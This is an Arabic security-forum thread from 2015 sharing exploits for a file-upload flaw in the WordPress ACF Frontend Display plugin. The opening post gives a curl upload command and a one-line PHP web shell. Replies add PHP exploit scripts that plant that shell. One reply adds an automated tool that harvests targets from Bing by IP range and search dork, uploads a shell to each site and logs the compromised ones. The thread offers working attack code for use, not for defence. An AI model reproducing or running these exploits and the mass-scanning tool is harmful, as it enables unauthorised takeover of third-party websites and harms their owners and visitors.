TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 05-07-2015, 04:57 PM
الصورة الرمزية miutex
miutex
عضو مميز
 
حـالة التــواجـد : miutex غير متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 102
شكراً:87
تم شكره 271 مرة في 63 مشاركة
معدل تقييم المستوى: 0
miutex بدون تقييم
افتراضي WP Plugin Free ACF Frontend Display File Upload Vulnerability

كود PHP:
+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+

curl -k -X POST -F "action=upload" -F "[email protected]/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"

File Path:
site/wp-content/uploads/uigen_YEAR/file.php

Example:
site/wp-content/uploads/uigen_2015/evil.php

evil.php:
<?php passthru($_GET['cmd']); ?>

POC:
http://i.imgur.com/7rQClr6.png


TUNISIAN CYBER(miutex)-S4E
 

 

 

" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة
رد مع اقتباس
18 أعضاء قالوا شكراً لـ miutex على المشاركة المفيدة:
  #2  
قديم 05-07-2015, 11:07 PM
الصورة الرمزية M-X3
M-X3
عضو مميز
 
حـالة التــواجـد : M-X3 غير متواجد حالياً
تاريخ التسجيل: Jan 2013
الجــــنــــــس: ذكـر
المشاركات: 256
شكراً:160
تم شكره 84 مرة في 46 مشاركة
معدل تقييم المستوى: 0
M-X3 بدون تقييم
افتراضي رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

ما في استغلال php ؟  
رد مع اقتباس
  #3  
قديم 06-07-2015, 12:06 AM
الصورة الرمزية 0x00000f4
0x00000f4
عضو جديد
 
حـالة التــواجـد : 0x00000f4 غير متواجد حالياً
تاريخ التسجيل: Jun 2015
الجــــنــــــس: ذكـر
الــهـــوايـــــة: الأكل
المشاركات: 26
شكراً:23
تم شكره 136 مرة في 18 مشاركة
معدل تقييم المستوى: 0
0x00000f4 بدون تقييم
افتراضي رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

اقتباس:
المشاركة الأصلية كتبت بواسطة M-X3 مشاهدة المشاركة

ما في استغلال php ؟

على السريع

كود PHP:
<?php
/*
Title : WP Plugin Free ACF Frontend Display File Upload Vulnerability
Shell : site/wp-content/uploads/uigen_2015/xoxo.php
Cod3r by Lov3rDns (F)
Author: TUNISIAN CYBER
*/
$url $argv[1];
echo 
"\n\tPath Shell : ";
$love trim(fgets(STDIN));

$select $url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php';
$POST = @array('action' => 'upload','files' =>'@'.$love.'','site' =>$url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php');
echo 
"\r\n[*] Xploiting => ".$url."\r\n";
$curl curl_init();
curl_setopt($curlCURLOPT_URL$select);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS,$POST);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
$result curl_exec($curl);
if(
eregi('xoxo',$result))
{
  echo 
"[ + ] Found => ".$url."/wp-content/uploads/uigen_2015/xoxo.php\r\n";
}else
{
  echo 
"[ - ] Not Found\r\n";
}
?>
 

 

 





اللهم إنا نسألك علماً نافعاً

رد مع اقتباس
3 أعضاء قالوا شكراً لـ 0x00000f4 على المشاركة المفيدة:
  #4  
قديم 06-07-2015, 12:09 AM
الصورة الرمزية 0x00000f4
0x00000f4
عضو جديد
 
حـالة التــواجـد : 0x00000f4 غير متواجد حالياً
تاريخ التسجيل: Jun 2015
الجــــنــــــس: ذكـر
الــهـــوايـــــة: الأكل
المشاركات: 26
شكراً:23
تم شكره 136 مرة في 18 مشاركة
معدل تقييم المستوى: 0
0x00000f4 بدون تقييم
افتراضي رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

تعديل طفيف بسبب الاستعجال


كود PHP:
<?php
/*
Title : WP Plugin Free ACF Frontend Display File Upload Vulnerability
Shell : site/wp-content/uploads/uigen_2015/xoxo.php
Cod3r by Lov3rDns (F)
Author: TUNISIAN CYBER
*/
echo "\n\tTarget : ";
$url trim(fgets(STDIN));
echo 
"\n\tPath Shell : ";
$love trim(fgets(STDIN));

$select $url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php';
$POST = @array('action' => 'upload','files' =>'@'.$love.'','site' =>$url.'/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php');
echo 
"\r\n[*] Xploiting => ".$url."\r\n";
$curl curl_init();
curl_setopt($curlCURLOPT_URL$select);
curl_setopt($curlCURLOPT_POST1);
curl_setopt($curlCURLOPT_POSTFIELDS,$POST);
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
curl_setopt($curlCURLOPT_FOLLOWLOCATION1);
$result curl_exec($curl);
if(
eregi('xoxo',$result))
{
  echo 
"[ + ] Found => ".$url."/wp-content/uploads/uigen_2015/xoxo.php\r\n";
}else
{
  echo 
"[ - ] Not Found\r\n";
}
?>

php exp.php

شكراً miutex  

 

 





اللهم إنا نسألك علماً نافعاً

رد مع اقتباس
3 أعضاء قالوا شكراً لـ 0x00000f4 على المشاركة المفيدة:
  #5  
قديم 06-07-2015, 12:38 AM
الصورة الرمزية bl4ck-dz
bl4ck-dz
عضو نشيط
 
حـالة التــواجـد : bl4ck-dz غير متواجد حالياً
تاريخ التسجيل: Sep 2014
الجــــنــــــس: ذكـر
المشاركات: 32
شكراً:138
تم شكره 36 مرة في 14 مشاركة
معدل تقييم المستوى: 0
bl4ck-dz بدون تقييم
Post رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

استغلال اوتوماتيكي للثغرة

يمكنك تعديل الكومنت لكي تقوم بالاستغلال ب list

كود بلغة HTML:
<?php 
/*
by bl4ck-dz
*/
error_reporting(0);
@set_time_limit(0);

$ip1 = $argv[1];
$ip2 = $argv[2];
$dork=$argv[3];
echo iplong($ip1,$ip2,$dork);
function bing($dz) {
for ( $i=1;$i<=2000;$i+=10){
$ch = curl_init("http://www.bing.com/search?q=".urlencode($dz)."&first=".$i."&FORM=PERE5");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$exec = curl_exec($ch);
$patren = "/(<h2><a) (href\=\")(http\:\/\/)([a-z0-9\-]?(\.?)?[a-z0-9])*(\/)*([a-z0-9])*(\/)/";
preg_match_all($patren,$exec,$links);
    foreach($links[0] as $finaly) {
        $file = $argv[4];
            $result = str_replace("<h2><a href=\"","",$finaly);
            acf($result);
}
if(!preg_match('#"sw_next"#',$exec)) break;
 }
}
function iplong($ip1,$ip2,$dork) {
for ($i = ip2long($ip1);$i<= ip2long($ip2);$i++) {
$dz1=  long2ip($i);
echo "\nScanning $dz1\n";
echo bing("ip:$dz1 $dork");
}
}
/*
echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
[email protected]_get_contents($x);
$ex=explode("\r\n",$get);
foreach($ex as $mag){
echo acf($mag);
}
*/
function acf($site) {
        $file= "dz.php";
        $ch = curl_init("$site/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php");
        curl_setopt($ch, CURLOPT_POST, true);   
        curl_setopt($ch, CURLOPT_POSTFIELDS, array( 'files'=>"@$file","action"=>"upload"));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
        $result = curl_exec($ch);
        $path = "{$site}/wp-content/uploads/uigen_2015/$file";
        $check =file_get_contents ("{$site}/wp-content/uploads/uigen_2015/$file");
        if (preg_match ('/bl4ck-dz/i',$check) ){
            echo "$site -> Exploited \n  Shell -> $path\n";
            $save = fopen ('result.txt','a+');
            fwrite ($save,$path."\n");
        }else
        echo "$site -> Not Exploited\n";
}        
?>
 
رد مع اقتباس
5 أعضاء قالوا شكراً لـ bl4ck-dz على المشاركة المفيدة:
  #6  
قديم 06-07-2015, 02:04 AM
الصورة الرمزية dowmaster xlr
dowmaster xlr
عضو جديد
 
حـالة التــواجـد : dowmaster xlr غير متواجد حالياً
تاريخ التسجيل: Jun 2013
مكـان الإقامـة : في دارنا
الجــــنــــــس: ذكـر
الــهـــوايـــــة: مازال ما بان والو
المشاركات: 28
شكراً:20
تم شكره 5 مرة في 5 مشاركة
معدل تقييم المستوى: 0
dowmaster xlr بدون تقييم
افتراضي رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

طريقة استعمال الاستغلال الاوتوماتيكي  

 

 


Ⓘ ⓛⓞⓥⓔ ⓣⓗⓔ ⓝⓔⓦ
ɒσωмαsτєя
رد مع اقتباس
  #7  
قديم 06-07-2015, 03:08 PM
الصورة الرمزية Mr_AnarShi-T
Mr_AnarShi-T
عضو مميز
 
حـالة التــواجـد : Mr_AnarShi-T غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 260
شكراً:246
تم شكره 717 مرة في 170 مشاركة
معدل تقييم المستوى: 9
Mr_AnarShi-T على طريق التميز
افتراضي رد: WP Plugin Free ACF Frontend Display File Upload Vulnerability

إستغلال بيرل لعيون حبيبي Miutex

here

تحياتي في أمان الله ~  

 

 

Perl & Java Lov3r

No perl No life
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة:

الكلمات الدلالية (Tags)
acf, display, file, free, frontend, plugin, upload, vulnerability, wp


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[شرح بالصور] WordPress Plugin FormCraft Arbitrary File Upload Vulnerability M1rx قسم جديد ثغرات الأعضاء 5 24-12-2014 09:49 PM
[web applications] - WordPress File Uploader Plugin PHP File Upload Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 28-01-2013 02:34 AM
[webapps / 0day] - Free Way osCommerce Remote File Upload / File Disclosure inj3ct0r قسم جديد ثغرات مواقع الحماية 0 20-10-2011 09:10 AM
[webapps / 0day] - WordPress Plugin (FCKeditor) File Upload Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 07-07-2011 01:20 PM


الساعة الآن 05:56 PM